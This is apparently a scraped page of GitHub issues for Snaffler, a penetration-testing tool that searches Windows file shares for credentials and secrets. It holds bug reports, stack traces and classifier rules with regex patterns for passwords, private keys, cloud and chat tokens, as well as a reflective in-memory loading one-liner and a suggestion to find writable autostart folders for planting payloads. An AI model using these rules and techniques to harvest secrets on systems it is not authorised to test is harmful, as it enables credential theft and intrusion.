FileScanner Tasks Completed: 0
FileScanner Tasks Remaining: 0
FileScanner Tasks Running: 0
74.6MB RAM in use.

ShareScanner queue finished, rebalancing workload.
Insufficient FileScanner queue size, rebalancing workload.
Max ShareFinder Threads: 0
Max TreeWalker Threads: 21
Max FileScanner Threads: 39
Been Snafflin' for 00:05:00.0321450 and we ain't done yet...

[LAB\jdoe@client1] 2023-11-08 08:16:23Z [Info] Status Update:
ShareFinder Tasks Completed: 0
ShareFinder Tasks Remaining: 0
ShareFinder Tasks Running: 0
TreeWalker Tasks Completed: 1
TreeWalker Tasks Remaining: 0
TreeWalker Tasks Running: 0
FileScanner Tasks Completed: 0
FileScanner Tasks Remaining: 0
FileScanner Tasks Running: 0
74.6MB RAM in use.

Insufficient FileScanner queue size, rebalancing workload.
Max ShareFinder Threads: 0
Max TreeWalker Threads: 22
Max FileScanner Threads: 38
Been Snafflin' for 00:05:00.0341542 and we ain't done yet...

[LAB\jdoe@client1] 2023-11-08 08:16:23Z [Info] Finished at 11/8/2023 8:16:23 AM
[LAB\jdoe@client1] 2023-11-08 08:16:23Z [Info] Snafflin' took 00:05:00.0341542
Snaffler out.
I snaffled 'til the snafflin was done.

The following PowerShell command and output shows, that it should indeed find something relevant:

PS C:\Users\jdoe> whoami
lab\jdoe
PS C:\Users\jdoe> Get-ChildItem -Recurse -Filter "*.xml" -Path \\server1.lab.local\DataShare01

    Directory: \\server1.lab.local\DataShare01\cvelistV5-main\cvelistV5-main\cves\2010\5xxx


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         11/8/2023   5:50 AM           2353 unattend.xml


    Directory: \\server1.lab.local\DataShare01\cvelistV5-main\cvelistV5-main\cves\2015\6xxx


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/18/2023   6:36 AM              0 credentials.xml
-a----         9/18/2023   6:36 AM              0 filezilla.xml

[ ... ]
PS C:\Users\jdoe> hostname
client1

Am I missing something here or is it not working as expected?

Use of escape characters in classifier WordList element

I just grabbed the latest Snaffler and noticed some changes in the new default.toml. Can you help me understand why we need to escape the file extension dot in the second rule but not the first?

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "DiscardExtExact"
MatchAction = "Discard"
MatchLocation = "FileExtension"
WordListType = "Exact"
MatchLength = 0
WordList = [".bmp", ".eps", ".gif", ".ico", ".jfi", ".jfif", ".jif", ".jpe", ".jpeg", ".jpg", ".png", ".psd", ".svg", ".tif", ".tiff", ".webp", ".xcf", ".ttf", ".otf", ".lock", ".css", ".less"]
Triage = "Green"

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "KeepExtExactBlack"
MatchAction = "Snaffle"
MatchLocation = "FileExtension"
WordListType = "Exact"
MatchLength = 0
WordList = ["\\.kdbx", "\\.kdb", "\\.ppk", "\\.vmdk", "\\.vhd", "\\.vhdx", "\\.psafe3", "\\.cscfg", "\\.kwallet", "\\.tblk", "\\.ovpn", "\\.bkf", "\\.v2i", "\\.gho", "\\.vbk", "\\.tib", "\\.tibx", "\\.mtf"]
Triage = "Black"

Issue with Get-DomainDFSShareV1

Get-DomainDFSShareV1 error : System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: startIndex at System.ThrowHelper.ThrowArgumentOutOfRangeException(ExceptionArgument argument, ExceptionResource resource) at System.BitConverter.ToUInt32(Byte[] value, Int32 startIndex) at SnaffCore.ActiveDirectory.DfsFinder.Parse_Pkt(Byte[] Pkt) at SnaffCore.ActiveDirectory.DfsFinder.Get_DomainDFSShareV1(DirectorySearch _directorySearch)

Not sure what is going on here. Is this a parsing issue on Snaffler's side?

Resume support

Got this error while running the new ACLCrimes branch:

Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
   at SnaffCore.Classifiers.EffectiveAccess.Win32.AuthzInitializeRemoteResourceManager(IntPtr rpcInitInfo, SafeAuthzRMHandle& authRM)
   at SnaffCore.Classifiers.EffectiveAccess.Win32.GetEffectivePermissions_AuthzInitializeResourceManager(String serverName, Boolean& remoteServerAvailable) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 479
   at SnaffCore.Classifiers.EffectiveAccess.Win32.GetEffectiveAccess(ObjectSecurity sd, IdentityReference2 identity, String serverName, Boolean& remoteServerAvailable, Exception& authzException) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 453
   at SnaffCore.Classifiers.EffectiveAccess.EffectiveAccess.GetEffectiveAccess(FileSystemInfo item, IdentityReference2 id, String serverName) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 113
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.GetEffectivePermissions(FileSystemInfo filesysInfo, String username) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 93
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.CanRw(FileSystemInfo filesysInfo) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 39
   at Classifiers.FileResult..ctor(FileInfo fileInfo) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\FileClassifier.cs:line 361
   at Classifiers.FileClassifier.ClassifyFile(FileInfo fileInfo) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\FileClassifier.cs:line 97
   at SnaffCore.FileScan.FileScanner.ScanFile(String file) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\FileScan\FileScanner.cs:line 26
   at SnaffCore.TreeWalk.TreeWalker.<>c__DisplayClass17_0.<WalkTree>b__0() in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\TreeWalk\TreeWalker.cs:line 45
   at System.Threading.Tasks.Task.Execute()
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.Tasks.Task.ExecuteWithThreadLocal(Task& currentTaskSlot)
   at System.Threading.Tasks.Task.ExecuteEntry(Boolean bPreventDoubleExecution)
   at SnaffCore.Concurrency.LimitedConcurrencyLevelTaskScheduler.<NotifyThreadPoolOfPendingWork>b__12_0(Object _) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Concurrency\BlockingTaskScheduler.cs:line 171
   at System.Threading.QueueUserWorkItemCallback.System.Threading.IThreadPoolWorkItem.ExecuteWorkItem()
   at System.Threading.ThreadPoolWorkQueue.Dispatch()

No idea what caused it unfortunately.

Ultrasnaffler on .elm files

Hello I wonder if ultrasnaffler can inspect .elm files content?

I wrote the following rules for .elm files but ultrasnaffler could not capture the sensitive words. I wonder if ultrasnaffler treat .elm files as a plain-text file?

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
Description = "look for keywords in email files"
RuleName = "RelayPdfFiles"
MatchAction = "Relay"
RelayTargets = ["SensitiveWords"]
MatchLocation = "FileExtension"
WordListType = "Exact"
WordList = [".eml"]

[[ClassifierRules]]
EnumerationScope = "ContentsEnumeration"
Description = "look for sensitive words in files"
RuleName = "SensitiveWords"
MatchAction = "Snaffle"
MatchLocation = "FileContentAsString" 
WordListType = "Contains"
WordList = ["passw","secret","thycotic","cyberark", "pw", "cred"]

Share Lister Functionality

I think there is an issue with the -a flag, which only runs the Sharefinder and shows the identified shares.
At least for me on the test domain the tool does not output many if any shares when I pass the flag.

Running the full scan does show many more shares.

If you need examples, just ask :)

Way to specify list of targets?

Hi. Thanks for the tool!
Is there a way to provider snaffler a list of targets or a range (like 10.0.0.0/24) to look through?
I'm currently looping through -i with a script. But that feels kinda dirty.
Thanks!

Compiling Issue

I am trying to download and compile Snaffler into and exe.
I downloaded Snaffler master folder from: https://github.com/SnaffCon/Snaffler

I downloaded .NET developer framework from: https://dotnet.microsoft.com/en-us/download/dotnet-framework/net48

I opened cmd and navigated to the snaffler-master\snaffler folder, then ran c:\Windows[Microsoft.NET](https://microsoft.net/)\Framework\v4.0.30319\csc.exe /t:exe /out:snaffler.exe Snaffler.cs

Received the following results:

Microsoft (R) Visual C# Compiler version 4.8.4084.0

for C# 5

Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

Snaffler.cs(9,13): error CS0246: The type or namespace name 'SnaffleRunner' could not be found (are you missing a using

directive or an assembly reference?)

Snaffler.cs(9,40): error CS0246: The type or namespace name 'SnaffleRunner' could not be found (are you missing a using

directive or an assembly reference?)

Any and all help is appreciated.

UltraSnaffler does not quit after execution

It seems the tool keeps running, when I give it a PathTarget. I see utilization in the tool for some while and output on the test-path. But after a while it stops and does not use any resources but also does not quit with a "I'm done" message.

Might this be caused by a config clash?

I also noticed you quadruple escape backslashes now in UltraSnaffler and some rules have additional parameters e.g.:

# Snaffler
WordList = ["\\print$", "\\ipc$"]
# vs UltraSnaffler
WordList = ["\\\\{2}print\\$", "\\\\{2}ipc\\$"]

Two example configurations would be awesome to be added to the repository, as the -z generate does not include comments and therefore unused parameters when generated.

Separate repository of rules for snaffling

It would be great if the repository of what to snaffle was kept separate to the Snaffler tool itself. This allows people to build alternative implementations, and most importantly, update the two repositories independently (which makes it a lot easier to contribute to rules).

BytesToString() for TSV output?

This is probably a matter of personal taste, but I think that the TSV output should skip the BytesToString() translation. I assume that anyone who wants TSV output will be either consuming output with another tool or going straight to Excel. In those cases, it would be more useful to have raw digits.

Before I start a PR for this, are there reasons to keep the human-friendly format in the TSV output?

There is also a spare delimiter that needs to be removed at the beginning of the TSV template:

fileResultTemplate = Options.Separator + "{0}" + Options.Separator + "{1}"  . . . .

This results in a double-up here (between File and Red):

#[File]##Red#KeepConfigRegexRed#

I'll fix that in the same PR if the TSV item above is agreeable.

UltraSnaffler Dependencies

Heyhey!

I updated since a while and now see that UltraSnaffler is not working any more 😢

From what I see your added a local dependency AlphaFS from your local Group3r repo:
20cbe33

I tried cloning and compiling grouper in the same folder level where Snaffler is located, but it does not work.
Compilation errors in Group3r:
image

So I installed AlphaFS from Nuget (2.2.6) for Snaffler and UltraSnaffler in the UltrtaSnaffler solution and am left with the error on the bottom of this image:
image

Note. Snaffler itself compiles fine :)

Edit:
I just had a more in depth look and it seems UltraSnaffler does not like the new way of checking permissions.
I removed all RwStatus related stuff and it compiles. Of course now it does lack all permission checks. 😅

Specify credentials to use

Hello.
Another feature request that I think would be handy.
I'd like to be able to run snaffler from a non-domain joined machine by specifying:

-u username -p password -d domain

Doing this allows me to easily test different users in different groups and review different sets of permissions by simply comparing the output without having to mess around with runas or proxying through something else.

Would be a very handy feature to have.

Thanks

The value '2097151' is not valid for this usage of the type FileSystemRights

[REDACTED\ss23@XXX] 2021-09-21 13:14:45Z [Error] System.ArgumentOutOfRangeException: The value '2097151' is not valid for this usage of the type FileSystemRights.
Parameter name: fileSystemRights
   at System.Security.AccessControl.FileSystemAccessRule.AccessMaskFromRights(FileSystemRights fileSystemRights, AccessControlType controlType)
   at SnaffCore.Classifiers.EffectiveAccess.EffectiveAccess.GetEffectiveAccess(FileSystemInfo item, IdentityReference2 id, String serverName) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 113
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.GetEffectivePermissions(FileSystemInfo filesysInfo, String username) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 88

No idea what is causing it :)

Some ClassifierRules shadow other ClassifierRules

It seems that I can't just add the German ClassifierRules behind the default classifier ruleset as the matching will not happen then.

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "KeepGermanFilenameRegexRed"
MatchAction = "Snaffle"
Description = "Files with these file name patterns are very interesting in German companies."
MatchLocation = "FileName"
WordListType = "Regex"
MatchLength = 0
WordList = ["(Kenn|Pass)w[oö]rte?r?", "Schlüssel", "Zug[aä]ng[es]?", "T[oü]r[ -]?Code", "PINs?\\.", "Kont(o|en)", "Logindaten", "Anmeld(edaten|ung)"]
Triage = "Red"

I iterated through the rules and noticed the following rule to be the issue:

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "ConfigContentByExt"
MatchAction = "Relay"
RelayTarget = "KeepConfigRegexRed"
Description = "Files with these extensions will be subjected to a generic search for keys and such."
MatchLocation = "FileExtension"
WordListType = "Exact"
MatchLength = 0
WordList = ["\\.yaml", "\\.yml", "\\.toml", "\\.xml", "\\.json", "\\.config", "\\.ini", "\\.inf", "\\.cnf", "\\.conf", "\\.properties", "\\.env", "\\.dist", "\\.txt", "\\.sql", "\\.log", "\\.sqlite", "\\.sqlite3", "\\.fdb"]
Triage = "Green"
[[ClassifierRules]]
EnumerationScope = "ContentsEnumeration"
RuleName = "KeepConfigRegexRed"
MatchAction = "Snaffle"
Description = "A description of what a rule does."
MatchLocation = "FileContentAsString"
WordListType = "Regex"
MatchLength = 0
WordList = ["sqlconnectionstring\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "connectionstring\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "validationkey\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "decryptionkey\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "passwo?r?d\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "CREATE (USER|LOGIN) .{0,200} (IDENTIFIED BY|WITH PASSWORD)", "(xox[pboa]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}", "aws[_\\-\\.]?key", "[_\\-\\.]?api[_\\-\\.]?key", "[_\\-\\.]oauth\\s*=", "client_secret", "secret[_\\-\\.]?(key)?\\s*=", "-----BEGIN( RSA| OPENSSH| DSA| EC| PGP)? PRIVATE KEY( BLOCK)?-----", "(\\s|\\'|\\\"|\\^|=)(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}(\\s|\\'|\\\"|$)", "NVRAM config last updated", "enable password \\.", "simple-bind authenticated encrypt"]
Triage = "Red"

Moving the German ClassifierRules above the mentioned extension rule will result in the files being discovered.

I also found out that it will find the files if I give the german test files another extension e.g.
image

Why does the scanner stop after the first classifier matches? I think it's important to also apply the upfollowing rules as without it all the .txt files with juicy names will not be discovered.

Load as assembly (System.Reflection.Assembly) and Environment.Exit

When loading the .exe reflective in a Powershell Session, e.g. like this:
$a = [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\tools\Snaffler\Snaffler\bin\Release\snaffler.exe")) $Snaffler = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($a)) [Snaffler.Snaffler]::Main("-h")
(Yes the base64 encode / decode is useless in this case, but needed in the final script)
the Environment.Exit statements are exiting the complete hosting powershell process. Any idea to prevent this? Commenting the statements seem to avoid that problem, but of course then the threads do not exit properly and the memory usage is extreme, until a crash occours.

Not reading sysvol or netlogon shares

Config:

ComputerTargets = ["XXXX"]
ScanSysvol = true
ScanNetlogon = true

Output

2021-03-07 22:40:05 -05:00 [Info] Creating a sharefinder task for XXXXXX
2021-03-07 22:40:05 -05:00 [Info] Created all sharefinder tasks.
 . . . .
 
2021-03-07 22:40:35 -05:00 [Info] Status Update:
ShareFinder Tasks Completed: 1
ShareFinder Tasks Remaining: 0
ShareFinder Tasks Running: 0
TreeWalker Tasks Completed: 0
TreeWalker Tasks Remaining: 0
TreeWalker Tasks Running: 0
FileScanner Tasks Completed: 0
FileScanner Tasks Remaining: 0
FileScanner Tasks Running: 0

No SYSVOL or NETLOGON scanned.

The output directory is always C:\ with -m

Hey there, amazing tool - really great work!

One thing that has confused me is when I use -m and provide a directory it always seems to put interesting files in C:\ instead?

Not a big deal and I'm probably doing something wrong but curious nonetheless.

Thanks

Feature Suggestion: Easy way to scan client PCs only

Got Snaffler recommended recently and love it so far. Now I'd like to do a daytime scan of client PCs only. AFAIK currently the only way to scan individual hosts is to use -n and specify them individually. Fine so far and I guess I can squeeze all the client names to scan into the 8191 max char limit of a command prompt line. But there might be more comfortable options, e.g.:

  • Specify a file containing one host name per line
  • Specify one or more OUs to use for computer account enumeration
  • Specify a name pattern for the computer accounts to be included in the scan

Edit: I just found out via -z generate that it is possible to use an individual ComputerTargetsLdapFilter if you specify an options file. Will try this, looks like a good way to achieve some of what I have in mind.

Deduplicate findings

It happens sometimes that the exact same result is found several times in the output log (at least the log file, I do not use much the stdout output).

Example of duplicated output:

[xxx@xxx] 2022-02-15 11:37:56Z [File] {Black}<KeepExtExactBlack|R|^\.kdbx$|2,7kB|2022-02-10 16:38:21Z>(\\toto\share\KEEPASS\user.kdbx) .kdbx
[xxx@xxx] 2022-02-15 11:47:18Z [File] {Black}<KeepExtExactBlack|R|^\.kdbx$|2,7kB|2022-02-10 16:38:21Z>(\\toto\share\KEEPASS\user.kdbx) .kdbx

Maybe this is related to several workers finding the same thing, I don't know. However this is quite a problem with big networks because it can lead to a log that is twice the normal length and a lot longer to read.

Some deduplication mechanism could be implemented either before writing the log entry or at the end before closing the file.

Discard Rules not obeyed

The new rule folders and toml files are nice. I wonder though how the order is determined.
I tested the branch and noticed that PathRules\Discard\DiscardWinSystemDirs.toml is ignored e.g.
Maybe it matches but not early enough. Is there logic that does check all discard rules before the keeper rules?
At least this happens here with a patched (go get it compile) UltraSnaffler version.

image

I see at least this which should make it to be the correct order:

public enum MatchAction
    {
        Discard,
        SendToNextScope,
        Snaffle,
        Relay,
        CheckForKeys,
        EnterArchive
    }

Same issue on Snaffler without Ultra.

Originally posted by @cmprmsd in #78 (comment)

I'm looking into it a bit and it seems the dirResult object is correctly set to ScanDir = false.
But the snaffling part does ignore it:

I added the following to ClassifyDir:

case MatchAction.Discard:
                        dirResult.ScanDir = false;
                        Mq.Info("Scan: " + dirResult.ScanDir.ToString() + " "+ dirResult.DirPath.ToString());
                        return dirResult;

The output shows that the directory is still being searched:

2022-02-26 12:42:55Z	[Info]	Scan: False C:\Windows\System32\de-DE
[File]	Green	KeepNameContainsGreen	R			passw	3584	2019-12-07 14:51:01Z	C:\Windows\System32\de-DE\PasswordOnWakeSettingFlyout.exe.mui	PasswordOnWakeSettingFlyout.exe.mui
[File]	Green	KeepNameContainsGreen	R			passw	4608	2019-12-07 14:50:59Z	C:\Windows\System32\de-DE\PasswordEnrollmentManager.dll.mui	PasswordEnrollmentManager.dll.mui

I also added some debugging to WalkTree and there seems to be a double calling on the function:

02-26 14:30:19Z	[Info]	Scan in WalkTree: True C:\Windows\System32\de-DE\Licenses
02-26 14:30:31Z	[Info]	Scan: False C:\Windows\System32\de-DE\Licenses
02-26 14:30:31Z	[Info]	Scan in WalkTree: False C:\Windows\System32\de-DE\Licenses

Checking for write permissions?

Hi there.
I have a feature request. Would it be possible to also perform checks if there's write permissions for the user running snaffler?

Ideally just looking at the top level share (rather than every subsequent folder in the share).

Output something like:
2021-06-07 11:14:11 +10:00 [Share-Writeable] {Yellow}(\\server.fqdn.local\writableshare)

Would be suuuuper helpful.
Thanks!

Permission Checking and rules for it

Hey l0ss!

I think we forgot to open a new issue for the permission checks discussed in #84
I just noticed that the permissions are still hardcoded and thought, it may be worth a shot to get this done.

You mentioned a better way that you worked on in group3r. I'll have a look at it if I find some spare time.

For the future it would make sense to have rules to identify e.g. folders like Microsoft's autostart folder write access in order to place some evil stuff in it during engagements.
We could brainstorm also on some other folders that might be critical like wwwroot or /var/www.

Have a great weekend!

Support for CSV export

Hi @l0ss and @Sh3r4 ,

First off, thank you for creating such a fantastic tool! I've used it on multiple assessments now, and it has consistently found troves of credentials, secrets, or other sensitive bits of information that would have otherwise led to a significant compromise.

I wanted to ask if you have any plans to support CSV exports from Snaffler? If not, is there a strongly typed JSON schema available so that JSON output can be reliably parsed and processed?

Rules to look for VPN Creds

Unfortunately I find VPN creds in txt/docx/xlsx file frequently. I think rules to find these file would be helpful.

I can work on the rules just wanted to know your thoughts?

Case Sensitive Matching

Hi! :)
I noticed during my tests, that the matching is always case insensitive as also described in your readme.

When we want to match certain words in regex rules e.g. PINs? it would also match many other words e.g.

  • mmcsnapins
  • igxpin.exe
  • colorschememapping.xml
  • SnapIn.dll
  • mdmpin.inf
  • mdmpin.PNF
  • EmpInv.xml

and many more. This could be ruled out (hoho) with case sensitive matching and drastically reduce false positives.

As I already identified several interesting files with PIN matching I would not want to drop the keyword as a whole.

I hope the detailed feedback and many issues are okay and Snaffler won't murder me. 🔪

TSV output is spaced instead of tabbed

The TSV output is actually SSV (spaced 🗡️ )

[host] 2021-08-16 13:07:19Z [File] Green KeepNameContainsGreen R W passw 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt passwort.txt
[host] 2021-08-16 13:07:19Z [File] Red KeepGermanFilenameRegexRed R W Logindaten 0 2021-08-16 10:50:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.imagine logindaten.imagine
[host] 2021-08-16 13:07:19Z [File] Red KeepConfigRegexRed R W simple-bind authenticated encrypt 33 2021-08-16 10:43:52Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\bla.toml simple-bind authenticated encrypt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Anmeld(edaten|ung) 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\anmeldung.txt anmeldung.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Anmeld(edaten|ung) 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\anmeldedaten.txt anmeldedaten.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W (Kenn|Pass)w[o�]rte?r? 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Kennw�rter.txt Kennw�rter.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Logindaten 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.txt logindaten.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Logindaten 0 2021-08-16 10:50:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.imagine logindaten.imagine
[host] 2021-08-16 13:13:32Z [File] Green KeepNameContainsGreen R W passw 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt passwort.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Kont(o|en) 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\konten.txt konten.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Schl�ssel 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Schl�ssel.txt Schl�ssel.txt
[host]	2021-08-16	13:07:19Z	[File]	Green	KeepNameContainsGreen	R	W	passw	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt	passwort.txt
[host]	2021-08-16	13:07:19Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Logindaten	0	2021-08-16	10:50:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.imagine	logindaten.imagine
[host]	2021-08-16	13:07:19Z	[File]	Red	KeepConfigRegexRed	R	W	simple-bind	authenticated	encrypt	33	2021-08-16	10:43:52Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\bla.toml	simple-bind	authenticated	encrypt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Anmeld(edaten|ung)	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\anmeldung.txt	anmeldung.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Anmeld(edaten|ung)	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\anmeldedaten.txt	anmeldedaten.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	(Kenn|Pass)w[o�]rte?r?	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Kennw�rter.txt	Kennw�rter.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Logindaten	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.txt	logindaten.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Logindaten	0	2021-08-16	10:50:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.imagine	logindaten.imagine
[host]	2021-08-16	13:13:32Z	[File]	Green	KeepNameContainsGreen	R	W	passw	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt	passwort.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Kont(o|en)	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\konten.txt	konten.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Schl�ssel	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Schl�ssel.txt	Schl�ssel.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepConfigRegexRed	R	W	simple-bind	authenticated	encrypt	33	2021-08-16	10:43:52Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\bla.toml	simple-bind	authenticated	encrypt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	(Kenn|Pass)w[o�]rte?r?	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt	passwort.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	PINs?\.	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\pins.txt	pins.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Zug[a�]ng[es]?	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\zugangsdaten.txt	zugangsdaten.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	T[o�]r[	-]?Code	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Torcode.txt	Torcode.txt
[host]	2021-08-16	13:15:12Z	[Info]	Parsing	args...

The latter one can be rainbowed correctly:
image

But when I replace all spaces with tabs it also converts spaces in filenames and spaces in regex to tabs, which then destroys the columns.
image

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.